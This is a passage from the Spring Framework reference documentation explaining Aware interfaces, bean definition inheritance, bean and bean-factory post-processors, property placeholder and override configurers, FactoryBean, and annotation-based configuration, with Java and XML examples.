{\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\n\t\t\tConfigurableApplicationContext ctx = new ClassPathXmlApplicationContext(\n\t\t\t\t\tnew String []{\"beans.xml\"});\n\n\t\t\t\/\/ add a shutdown hook for the above context...\n\t\t\tctx.registerShutdownHook();\n\n\t\t\t\/\/ app runs here...\n\n\t\t\t\/\/ main method exits, hook is called prior to the app shutting down...\n\n\t\t}\n\t}\n----\n\n\n\n[[beans-factory-aware]]\n=== ApplicationContextAware and BeanNameAware\n\nWhen an `ApplicationContext` creates an object instance that implements the\n`org.springframework.context.ApplicationContextAware` interface, the instance is provided\nwith a reference to that `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface ApplicationContextAware {\n\n\t\tvoid setApplicationContext(ApplicationContext applicationContext) throws BeansException;\n\n\t}\n----\n\nThus beans can manipulate programmatically the `ApplicationContext` that created them,\nthrough the `ApplicationContext` interface, or by casting the reference to a known\nsubclass of this interface, such as `ConfigurableApplicationContext`, which exposes\nadditional functionality. One use would be the programmatic retrieval of other beans.\nSometimes this capability is useful; however, in general you should avoid it, because it\ncouples the code to Spring and does not follow the Inversion of Control style, where\ncollaborators are provided to beans as properties. Other methods of the\n`ApplicationContext` provide access to file resources, publishing application events, and\naccessing a `MessageSource`. These additional features are described in\n<<context-introduction>>\n\nAs of Spring 2.5, autowiring is another alternative to obtain reference to the\n`ApplicationContext`. The \"traditional\" `constructor` and `byType` autowiring modes (as\ndescribed in <<beans-factory-autowire>>) can provide a dependency of type\n`ApplicationContext` for a constructor argument or setter method parameter,\nrespectively. For more flexibility, including the ability to autowire fields and\nmultiple parameter methods, use the new annotation-based autowiring features. If you do,\nthe `ApplicationContext` is autowired into a field, constructor argument, or method\nparameter that is expecting the `ApplicationContext` type if the field, constructor, or\nmethod in question carries the `@Autowired` annotation. For more information, see\n<<beans-autowired-annotation>>.\n\nWhen an `ApplicationContext` creates a class that implements the\n`org.springframework.beans.factory.BeanNameAware` interface, the class is provided with\na reference to the name defined in its associated object definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface BeanNameAware {\n\n\t\tvoid setBeanName(String name) throws BeansException;\n\n\t}\n----\n\nThe callback is invoked after population of normal bean properties but before an\ninitialization callback such as `InitializingBean` __afterPropertiesSet__ or a custom\ninit-method.\n\n\n\n[[aware-list]]\n=== Other Aware interfaces\n\nBesides `ApplicationContextAware` and `BeanNameAware` discussed above, Spring offers a\nrange of `Aware` interfaces that allow beans to indicate to the container that they\nrequire a certain __infrastructure__ dependency. The most important `Aware` interfaces\nare summarized below - as a general rule, the name is a good indication of the\ndependency type:\n\n[[beans-factory-nature-aware-list]]\n.Aware interfaces\n|===\n| Name| Injected Dependency| Explained in...\n\n| `ApplicationContextAware`\n| Declaring `ApplicationContext`\n| <<beans-factory-aware>>\n\n| `ApplicationEventPublisherAware`\n| Event publisher of the enclosing `ApplicationContext`\n| <<context-introduction>>\n\n| `BeanClassLoaderAware`\n| Class loader used to load the bean classes.\n| <<beans-factory-class>>\n\n| `BeanFactoryAware`\n| Declaring `BeanFactory`\n| <<beans-factory-aware>>\n\n| `BeanNameAware`\n| Name of the declaring bean\n| <<beans-factory-aware>>\n\n| `BootstrapContextAware`\n| Resource adapter `BootstrapContext` the container runs in. Typically available only in\n JCA aware ``ApplicationContext``s\n| <<cci>>\n\n| `LoadTimeWeaverAware`\n| Defined __weaver__ for processing class definition at load time\n| <<aop-aj-ltw>>\n\n| `MessageSourceAware`\n| Configured strategy for resolving messages (with support for parametrization and\n internationalization)\n| <<context-introduction>>\n\n| `NotificationPublisherAware`\n| Spring JMX notification publisher\n| <<jmx-notifications>>\n\n| `ResourceLoaderAware`\n| Configured loader for low-level access to resources\n| <<resources>>\n\n| `ServletConfigAware`\n| Current `ServletConfig` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n\n| `ServletContextAware`\n| Current `ServletContext` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n|===\n\nNote again that usage of these interfaces ties your code to the Spring API and does not\nfollow the Inversion of Control style. As such, they are recommended for infrastructure\nbeans that require programmatic access to the container.\n\n\n\n\n[[beans-child-bean-definitions]]\n== Bean definition inheritance\nA bean definition can contain a lot of configuration information, including constructor\narguments, property values, and container-specific information such as initialization\nmethod, static factory method name, and so on. A child bean definition inherits\nconfiguration data from a parent definition. The child definition can override some\nvalues, or add others, as needed. Using parent and child bean definitions can save a lot\nof typing. Effectively, this is a form of templating.\n\nIf you work with an `ApplicationContext` interface programmatically, child bean\ndefinitions are represented by the `ChildBeanDefinition` class. Most users do not work\nwith them on this level, instead configuring bean definitions declaratively in something\nlike the `ClassPathXmlApplicationContext`. When you use XML-based configuration\nmetadata, you indicate a child bean definition by using the `parent` attribute,\nspecifying the parent bean as the value of this attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBean\" abstract=\"true\"\n\t\t\tclass=\"org.springframework.beans.TestBean\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithDifferentClass\"\n\t\t\tclass=\"org.springframework.beans.DerivedTestBean\"\n\t\t\t**parent=\"inheritedTestBean\"** init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- the age property value of 1 will be inherited from parent -->\n\t<\/bean>\n----\n\nA child bean definition uses the bean class from the parent definition if none is\nspecified, but can also override it. In the latter case, the child bean class must be\ncompatible with the parent, that is, it must accept the parent's property values.\n\nA child bean definition inherits scope, constructor argument values, property values, and\nmethod overrides from the parent, with the option to add new values. Any scope, initialization\nmethod, destroy method, and\/or `static` factory method settings that you specify will\noverride the corresponding parent settings.\n\nThe remaining settings are __always__ taken from the child definition: __depends on__,\n__autowire mode__, __dependency check__, __singleton__, __lazy init__.\n\nThe preceding example explicitly marks the parent bean definition as abstract by using\nthe `abstract` attribute. If the parent definition does not specify a class, explicitly\nmarking the parent bean definition as `abstract` is required, as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBeanWithoutClass\" abstract=\"true\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithClass\" class=\"org.springframework.beans.DerivedTestBean\"\n\t\t\tparent=\"inheritedTestBeanWithoutClass\" init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- age will inherit the value of 1 from the parent bean definition-->\n\t<\/bean>\n----\n\nThe parent bean cannot be instantiated on its own because it is incomplete, and it is\nalso explicitly marked as `abstract`. When a definition is `abstract` like this, it is\nusable only as a pure template bean definition that serves as a parent definition for\nchild definitions. Trying to use such an `abstract` parent bean on its own, by referring\nto it as a ref property of another bean or doing an explicit `getBean()` call with the\nparent bean id, returns an error. Similarly, the container's internal\n`preInstantiateSingletons()` method ignores bean definitions that are defined as\nabstract.\n\n[NOTE]\n====\n`ApplicationContext` pre-instantiates all singletons by default. Therefore, it is\nimportant (at least for singleton beans) that if you have a (parent) bean definition\nwhich you intend to use only as a template, and this definition specifies a class, you\nmust make sure to set the __abstract__ attribute to __true__, otherwise the application\ncontext will actually (attempt to) pre-instantiate the `abstract` bean.\n====\n\n\n\n\n[[beans-factory-extension]]\n== Container Extension Points\nTypically, an application developer does not need to subclass `ApplicationContext`\nimplementation classes. Instead, the Spring IoC container can be extended by plugging in\nimplementations of special integration interfaces. The next few sections describe these\nintegration interfaces.\n\n\n\n[[beans-factory-extension-bpp]]\n=== Customizing beans using a BeanPostProcessor\n\nThe `BeanPostProcessor` interface defines __callback methods__ that you can implement to\nprovide your own (or override the container's default) instantiation logic,\ndependency-resolution logic, and so forth. If you want to implement some custom logic\nafter the Spring container finishes instantiating, configuring, and initializing a bean,\nyou can plug in one or more `BeanPostProcessor` implementations.\n\nYou can configure multiple `BeanPostProcessor` instances, and you can control the order\nin which these ``BeanPostProcessor``s execute by setting the `order` property. You can\nset this property only if the `BeanPostProcessor` implements the `Ordered` interface; if\nyou write your own `BeanPostProcessor` you should consider implementing the `Ordered`\ninterface too. For further details, consult the javadocs of the `BeanPostProcessor` and\n`Ordered` interfaces. See also the note below on\n<<beans-factory-programmatically-registering-beanpostprocessors, programmatic\nregistration of ``BeanPostProcessor``s>>.\n\n[NOTE]\n====\n``BeanPostProcessor``s operate on bean (or object) __instances__; that is to say, the\nSpring IoC container instantiates a bean instance and __then__ ``BeanPostProcessor``s do\ntheir work.\n\n``BeanPostProcessor``s are scoped __per-container__. This is only relevant if you are\nusing container hierarchies. If you define a `BeanPostProcessor` in one container, it\nwill __only__ post-process the beans in that container. In other words, beans that are\ndefined in one container are not post-processed by a `BeanPostProcessor` defined in\nanother container, even if both containers are part of the same hierarchy.\n\nTo change the actual bean definition (i.e., the __blueprint__ that defines the bean),\nyou instead need to use a `BeanFactoryPostProcessor` as described in\n<<beans-factory-extension-factory-postprocessors>>.\n====\n\nThe `org.springframework.beans.factory.config.BeanPostProcessor` interface consists of\nexactly two callback methods. When such a class is registered as a post-processor with\nthe container, for each bean instance that is created by the container, the\npost-processor gets a callback from the container both __before__ container\ninitialization methods (such as InitializingBean's __afterPropertiesSet()__ and any\ndeclared init method) are called as well as __after__ any bean initialization callbacks.\nThe post-processor can take any action with the bean instance, including ignoring the\ncallback completely. A bean post-processor typically checks for callback interfaces or\nmay wrap a bean with a proxy. Some Spring AOP infrastructure classes are implemented as\nbean post-processors in order to provide proxy-wrapping logic.\n\nAn `ApplicationContext` __automatically detects__ any beans that are defined in the\nconfiguration metadata which implement the `BeanPostProcessor` interface. The\n`ApplicationContext` registers these beans as post-processors so that they can be called\nlater upon bean creation. Bean post-processors can be deployed in the container just\nlike any other beans.\n\nNote that when declaring a `BeanPostProcessor` using an `@Bean` factory method on a\nconfiguration class, the return type of the factory method should be the implementation\nclass itself or at least the `org.springframework.beans.factory.config.BeanPostProcessor`\ninterface, clearly indicating the post-processor nature of that bean. Otherwise, the\n`ApplicationContext` won't be able to autodetect it by type before fully creating it.\nSince a `BeanPostProcessor` needs to be instantiated early in order to apply to the\ninitialization of other beans in the context, this early type detection is critical.\n\n\n[[beans-factory-programmatically-registering-beanpostprocessors]]\n.Programmatically registering BeanPostProcessors\n[NOTE]\n====\nWhile the recommended approach for `BeanPostProcessor` registration is through\n`ApplicationContext` auto-detection (as described above), it is also possible to\nregister them __programmatically__ against a `ConfigurableBeanFactory` using the\n`addBeanPostProcessor` method. This can be useful when needing to evaluate conditional\nlogic before registration, or even for copying bean post processors across contexts in a\nhierarchy. Note however that ``BeanPostProcessor``s added programmatically __do not\nrespect the `Ordered` interface__. Here it is the __order of registration__ that\ndictates the order of execution. Note also that ``BeanPostProcessor``s registered\nprogrammatically are always processed before those registered through auto-detection,\nregardless of any explicit ordering.\n====\n\n.BeanPostProcessors and AOP auto-proxying\n[NOTE]\n====\nClasses that implement the `BeanPostProcessor` interface are __special__ and are treated\ndifferently by the container. All ``BeanPostProcessor``s __and beans that they reference\ndirectly__ are instantiated on startup, as part of the special startup phase of the\n`ApplicationContext`. Next, all ``BeanPostProcessor``s are registered in a sorted fashion\nand applied to all further beans in the container. Because AOP auto-proxying is\nimplemented as a `BeanPostProcessor` itself, neither ``BeanPostProcessor``s nor the beans\nthey reference directly are eligible for auto-proxying, and thus do not have aspects\nwoven into them.\n\nFor any such bean, you should see an informational log message: \"__Bean foo is not\neligible for getting processed by all BeanPostProcessor interfaces (for example: not\neligible for auto-proxying)__\".\n\nNote that if you have beans wired into your `BeanPostProcessor` using autowiring or\n`@Resource` (which may fall back to autowiring), Spring might access unexpected beans\nwhen searching for type-matching dependency candidates, and therefore make them\nineligible for auto-proxying or other kinds of bean post-processing. For example, if you\nhave a dependency annotated with `@Resource` where the field\/setter name does not\ndirectly correspond to the declared name of a bean and no name attribute is used, then\nSpring will access other beans for matching them by type.\n====\n\nThe following examples show how to write, register, and use ``BeanPostProcessor``s in an\n`ApplicationContext`.\n\n\n[[beans-factory-extension-bpp-examples-hw]]\n==== Example: Hello World, BeanPostProcessor-style\n\nThis first example illustrates basic usage. The example shows a custom\n`BeanPostProcessor` implementation that invokes the `toString()` method of each bean as\nit is created by the container and prints the resulting string to the system console.\n\nFind below the custom `BeanPostProcessor` implementation class definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage scripting;\n\n\timport org.springframework.beans.factory.config.BeanPostProcessor;\n\timport org.springframework.beans.BeansException;\n\n\tpublic class InstantiationTracingBeanPostProcessor implements BeanPostProcessor {\n\n\t\t\/\/ simply return the instantiated bean as-is\n\t\tpublic Object postProcessBeforeInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\treturn bean; \/\/ we could potentially return any object reference here...\n\t\t}\n\n\t\tpublic Object postProcessAfterInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\tSystem.out.println(\"Bean '\" + beanName + \"' created : \" + bean.toString());\n\t\t\treturn bean;\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:lang=\"http:\/\/www.springframework.org\/schema\/lang\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\/spring-lang.xsd\">\n\n\t\t<lang:groovy id=\"messenger\"\n\t\t\t\tscript-source=\"classpath:org\/springframework\/scripting\/groovy\/Messenger.groovy\">\n\t\t\t<lang:property name=\"message\" value=\"Fiona Apple Is Just So Dreamy.\"\/>\n\t\t<\/lang:groovy>\n\n\t\t<!--\n\t\twhen the above bean (messenger) is instantiated, this custom\n\t\tBeanPostProcessor implementation will output the fact to the system console\n\t\t-->\n\t\t<bean class=\"scripting.InstantiationTracingBeanPostProcessor\"\/>\n\n\t<\/beans>\n----\n\nNotice how the `InstantiationTracingBeanPostProcessor` is simply defined. It does not\neven have a name, and because it is a bean it can be dependency-injected just like any\nother bean. (The preceding configuration also defines a bean that is backed by a Groovy\nscript. The Spring dynamic language support is detailed in the chapter entitled\n<<dynamic-language>>.)\n\nThe following simple Java application executes the preceding code and configuration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\timport org.springframework.scripting.Messenger;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\t\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"scripting\/beans.xml\");\n\t\t\tMessenger messenger = (Messenger) ctx.getBean(\"messenger\");\n\t\t\tSystem.out.println(messenger);\n\t\t}\n\n\t}\n----\n\nThe output of the preceding application resembles the following:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nBean 'messenger' created : org.springframework.scripting.groovy.GroovyMessenger@272961\norg.springframework.scripting.groovy.GroovyMessenger@272961\n----\n\n\n[[beans-factory-extension-bpp-examples-rabpp]]\n==== Example: The RequiredAnnotationBeanPostProcessor\n\nUsing callback interfaces or annotations in conjunction with a custom\n`BeanPostProcessor` implementation is a common means of extending the Spring IoC\ncontainer. An example is Spring's `RequiredAnnotationBeanPostProcessor` - a\n`BeanPostProcessor` implementation that ships with the Spring distribution which ensures\nthat JavaBean properties on beans that are marked with an (arbitrary) annotation are\nactually (configured to be) dependency-injected with a value.\n\n\n\n[[beans-factory-extension-factory-postprocessors]]\n=== Customizing configuration metadata with a BeanFactoryPostProcessor\n\nThe next extension point that we will look at is the\n`org.springframework.beans.factory.config.BeanFactoryPostProcessor`. The semantics of\nthis interface are similar to those of the `BeanPostProcessor`, with one major\ndifference: `BeanFactoryPostProcessor` operates on the __bean configuration metadata__;\nthat is, the Spring IoC container allows a `BeanFactoryPostProcessor` to read the\nconfiguration metadata and potentially change it __before__ the container instantiates\nany beans other than ``BeanFactoryPostProcessor``s.\n\nYou can configure multiple ``BeanFactoryPostProcessor``s, and you can control the order in\nwhich these ``BeanFactoryPostProcessor``s execute by setting the `order` property.\nHowever, you can only set this property if the `BeanFactoryPostProcessor` implements the\n`Ordered` interface. If you write your own `BeanFactoryPostProcessor`, you should\nconsider implementing the `Ordered` interface too. Consult the javadocs of the\n`BeanFactoryPostProcessor` and `Ordered` interfaces for more details.\n\n[NOTE]\n====\nIf you want to change the actual bean __instances__ (i.e., the objects that are created\nfrom the configuration metadata), then you instead need to use a `BeanPostProcessor`\n(described above in <<beans-factory-extension-bpp>>). While it is technically possible\nto work with bean instances within a `BeanFactoryPostProcessor` (e.g., using\n`BeanFactory.getBean()`), doing so causes premature bean instantiation, violating the\nstandard container lifecycle. This may cause negative side effects such as bypassing\nbean post processing.\n\nAlso, ``BeanFactoryPostProcessor``s are scoped __per-container__. This is only relevant if\nyou are using container hierarchies. If you define a `BeanFactoryPostProcessor` in one\ncontainer, it will __only__ be applied to the bean definitions in that container. Bean\ndefinitions in one container will not be post-processed by ``BeanFactoryPostProcessor``s\nin another container, even if both containers are part of the same hierarchy.\n====\n\nA bean factory post-processor is executed automatically when it is declared inside an\n`ApplicationContext`, in order to apply changes to the configuration metadata that\ndefine the container. Spring includes a number of predefined bean factory\npost-processors, such as `PropertyOverrideConfigurer` and\n`PropertyPlaceholderConfigurer`. A custom `BeanFactoryPostProcessor` can also be used,\nfor example, to register custom property editors.\n\n[[null]]\n\nAn `ApplicationContext` automatically detects any beans that are deployed into it that\nimplement the `BeanFactoryPostProcessor` interface. It uses these beans as bean factory\npost-processors, at the appropriate time. You can deploy these post-processor beans as\nyou would any other bean.\n\n[NOTE]\n====\nAs with ``BeanPostProcessor``s , you typically do not want to configure\n``BeanFactoryPostProcessor``s for lazy initialization. If no other bean references a\n`Bean(Factory)PostProcessor`, that post-processor will not get instantiated at all.\nThus, marking it for lazy initialization will be ignored, and the\n`Bean(Factory)PostProcessor` will be instantiated eagerly even if you set the\n`default-lazy-init` attribute to `true` on the declaration of your `<beans \/>` element.\n====\n\n\n[[beans-factory-placeholderconfigurer]]\n==== Example: the Class name substitution PropertyPlaceholderConfigurer\n\nYou use the `PropertyPlaceholderConfigurer` to externalize property values from a bean\ndefinition in a separate file using the standard Java `Properties` format. Doing so\nenables the person deploying an application to customize environment-specific properties\nsuch as database URLs and passwords, without the complexity or risk of modifying the\nmain XML definition file or files for the container.\n\nConsider the following XML-based configuration metadata fragment, where a `DataSource`\nwith placeholder values is defined. The example shows properties configured from an\nexternal `Properties` file. At runtime, a `PropertyPlaceholderConfigurer` is applied to\nthe metadata that will replace some properties of the DataSource. The values to replace\nare specified as __placeholders__ of the form `${property-name}` which follows the Ant \/\nlog4j \/ JSP EL style.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n\t<\/bean>\n\n\t<bean id=\"dataSource\" destroy-method=\"close\"\n\t\t\tclass=\"org.apache.commons.dbcp.BasicDataSource\">\n\t\t<property name=\"driverClassName\" value=\"${jdbc.driverClassName}\"\/>\n\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t<\/bean>\n----\n\nThe actual values come from another file in the standard Java `Properties` format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.driverClassName=org.hsqldb.jdbcDriver\njdbc.url=jdbc:hsqldb:hsql:\/\/production:9002\njdbc.username=sa\njdbc.password=root\n----\n\nTherefore, the string `${jdbc.username}` is replaced at runtime with the value 'sa', and\nthe same applies for other placeholder values that match keys in the properties file.\nThe `PropertyPlaceholderConfigurer` checks for placeholders in most properties and\nattributes of a bean definition. Furthermore, the placeholder prefix and suffix can be\ncustomized.\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty placeholders with a dedicated configuration element. One or more locations can\nbe provided as a comma-separated list in the `location` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n----\n\nThe `PropertyPlaceholderConfigurer` not only looks for properties in the `Properties`\nfile you specify. By default it also checks against the Java `System` properties if it\ncannot find a property in the specified properties files. You can customize this\nbehavior by setting the `systemPropertiesMode` property of the configurer with one of\nthe following three supported integer values:\n\n* __never__ (0): Never check system properties\n* __fallback__ (1): Check system properties if not resolvable in the specified\n properties files. This is the default.\n* __override__ (2): Check system properties first, before trying the specified\n properties files. This allows system properties to override any other property source.\n\nConsult the `PropertyPlaceholderConfigurer` javadocs for more information.\n\n[TIP]\n====\n\nYou can use the `PropertyPlaceholderConfigurer` to substitute class names, which is\nsometimes useful when you have to pick a particular implementation class at runtime. For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\">\n\t\t\t<value>classpath:com\/foo\/strategy.properties<\/value>\n\t\t<\/property>\n\t\t<property name=\"properties\">\n\t\t\t<value>custom.strategy.class=com.foo.DefaultStrategy<\/value>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"serviceStrategy\" class=\"${custom.strategy.class}\"\/>\n----\n\nIf the class cannot be resolved at runtime to a valid class, resolution of the bean\nfails when it is about to be created, which is during the `preInstantiateSingletons()`\nphase of an `ApplicationContext` for a non-lazy-init bean.\n====\n\n\n[[beans-factory-overrideconfigurer]]\n==== Example: the PropertyOverrideConfigurer\n\nThe `PropertyOverrideConfigurer`, another bean factory post-processor, resembles the\n`PropertyPlaceholderConfigurer`, but unlike the latter, the original definitions can\nhave default values or no values at all for bean properties. If an overriding\n`Properties` file does not have an entry for a certain bean property, the default\ncontext definition is used.\n\nNote that the bean definition is __not__ aware of being overridden, so it is not\nimmediately obvious from the XML definition file that the override configurer is being\nused. In case of multiple `PropertyOverrideConfigurer` instances that define different\nvalues for the same bean property, the last one wins, due to the overriding mechanism.\n\nProperties file configuration lines take this format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nbeanName.property=value\n----\n\nFor example:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ndataSource.driverClassName=com.mysql.jdbc.Driver\ndataSource.url=jdbc:mysql:mydb\n----\n\nThis example file can be used with a container definition that contains a bean called\n__dataSource__, which has __driver__ and __url__ properties.\n\nCompound property names are also supported, as long as every component of the path\nexcept the final property being overridden is already non-null (presumably initialized\nby the constructors). In this example...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nfoo.fred.bob.sammy=123\n----\n\n... the `sammy` property of the `bob` property of the `fred` property of the `foo` bean\nis set to the scalar value `123`.\n\n[NOTE]\n====\nSpecified override values are always __literal__ values; they are not translated into\nbean references. This convention also applies when the original value in the XML bean\ndefinition specifies a bean reference.\n====\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty overriding with a dedicated configuration element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-override location=\"classpath:override.properties\"\/>\n----\n\n\n\n[[beans-factory-extension-factorybean]]\n=== Customizing instantiation logic with a FactoryBean\n\nImplement the `org.springframework.beans.factory.FactoryBean` interface for objects that\n__are themselves factories__.\n\nThe `FactoryBean` interface is a point of pluggability into the Spring IoC container's\ninstantiation logic. If you have complex initialization code that is better expressed in\nJava as opposed to a (potentially) verbose amount of XML, you can create your own\n`FactoryBean`, write the complex initialization inside that class, and then plug your\ncustom `FactoryBean` into the container.\n\nThe `FactoryBean` interface provides three methods:\n\n* `Object getObject()`: returns an instance of the object this factory creates. The\n instance can possibly be shared, depending on whether this factory returns singletons\n or prototypes.\n* `boolean isSingleton()`: returns `true` if this `FactoryBean` returns singletons,\n `false` otherwise.\n* `Class getObjectType()`: returns the object type returned by the `getObject()` method\n or `null` if the type is not known in advance.\n\nThe `FactoryBean` concept and interface is used in a number of places within the Spring\nFramework; more than 50 implementations of the `FactoryBean` interface ship with Spring\nitself.\n\nWhen you need to ask a container for an actual `FactoryBean` instance itself instead of\nthe bean it produces, preface the bean's id with the ampersand symbol ( `&`) when\ncalling the `getBean()` method of the `ApplicationContext`. So for a given `FactoryBean`\nwith an id of `myBean`, invoking `getBean(\"myBean\")` on the container returns the\nproduct of the `FactoryBean`; whereas, invoking `getBean(\"&myBean\")` returns the\n`FactoryBean` instance itself.\n\n\n\n\n[[beans-annotation-config]]\n== Annotation-based container configuration\n\n.Are annotations better than XML for configuring Spring?\n****\nThe introduction of annotation-based configurations raised the question of whether this\napproach is 'better' than XML. The short answer is __it depends__. The long answer is\nthat each approach has its pros and cons, and usually it is up to the developer to\ndecide which strategy suits them better. Due to the way they are defined, annotations\nprovide a lot of context in their declaration, leading to shorter and more concise\nconfiguration. However, XML excels at wiring up components without touching their source\ncode or recompiling them. Some developers prefer having the wiring close to the source\nwhile others argue that annotated classes are no longer POJOs and, furthermore, that the\nconfiguration becomes decentralized and harder to control.\n\nNo matter the choice, Spring can accommodate both styles and even mix them together.\nIt's worth pointing out that through its <<beans-java,JavaConfig>> option, Spring allows\nannotations to be used in a non-invasive way, without touching the target components\nsource code and that in terms of tooling, all configuration styles are supported by the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite].\n****\n\nAn alternative to XML setups is provided by annotation-based configuration which rely on\nthe bytecode metadata for wiring up components instead of angle-bracket declarations.\nInstead of using XML to describe a bean wiring, the developer moves the configuration\ninto the component class itself by using annotations on the relevant class, method, or\nfield declaration. As mentioned in <<beans-factory-extension-bpp-examples-rabpp>>, using\na `BeanPostProcessor` in conjunction with annotations is a common means of extending the\nSpring IoC container. For example, Spring 2.0 introduced the possibility of enforcing\nrequired properties with the <<beans-required-annotation,@Required>> annotation. Spring\n2.5 made it possible to follow that same general approach to drive Spring's dependency\ninjection. Essentially, the `@Autowired` annotation provides the same capabilities as\ndescribed in <<beans-factory-autowire>> but with more fine-grained control and wider\napplicability. Spring 2.5 also added support for JSR-250 annotations such as\n`@PostConstruct`, and `@PreDestroy`. Spring 3.0 added support for JSR-330 (Dependency\nInjection for Java) annotations contained in the javax.inject package such as `@Inject`\nand `@Named`. Details about those annotations can be found in the\n<<beans-standard-annotations,relevant section>>.\n[NOTE]\n====\nAnnotation injection is performed __before__ XML injection, thus the latter\nconfiguration will override the former for properties wired through both approaches.\n====\nAs always, you can register them as individual bean definitions, but they can also be\nimplicitly registered by including the following tag in an XML-based Spring\nconfiguration (notice the inclusion of the `context` namespace):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t<\/beans>\n----\n\n(The implicitly registered post-processors include\n{api-spring-framework}\/beans\/factory\/annotation\/AutowiredAnnotationBeanPostProcessor.html[`AutowiredAnnotationBeanPostProcessor`],\n {api-spring-framework}\/context\/annotation\/CommonAnnotationBeanPostProcessor.html[`CommonAnnotationBeanPostProcessor`],\n {api-spring-framework}\/orm\/jpa\/support\/PersistenceAnnotationBeanPostProcessor.html[`PersistenceAnnotationBeanPostProcessor`],\nas well as the aforementioned\n{api-spring-framework}\/beans\/factory\/annotation\/RequiredAnnotationBeanPostProcessor.html[`RequiredAnnotationBeanPostProcessor`].)\n\n[NOTE]\n====\n`<context:annotation-config\/>` only looks for annotations on beans in the same\napplication context in which it is defined. This means that, if you put\n`<context:annotation-config\/>` in a `WebApplicationContext` for a `DispatcherServlet`,\nit only checks for `@Autowired` beans in your controllers, and not your services. See\n<<mvc-servlet>> for more information.\n====\n\n\n\n[[beans-required-annotation]]\n=== @Required\n\nThe `@Required` annotation applies to bean property setter methods, as in the following\nexample:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Required\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThis annotation simply indicates that the affected bean property must be populated at\nconfiguration time, through an explicit property value in a bean definition or through\nautowiring. The container throws an exception if the affected bean property has not been\npopulated; this allows for eager and explicit failure, avoiding ``NullPointerException``s\nor the like later on. It is still recommended that you put assertions into the bean\nclass itself, for example, into an init method. Doing so enforces those required\nreferences and values even when you use the class outside of a container.\n\n\n\n[[beans-autowired-annotation]]\n=== 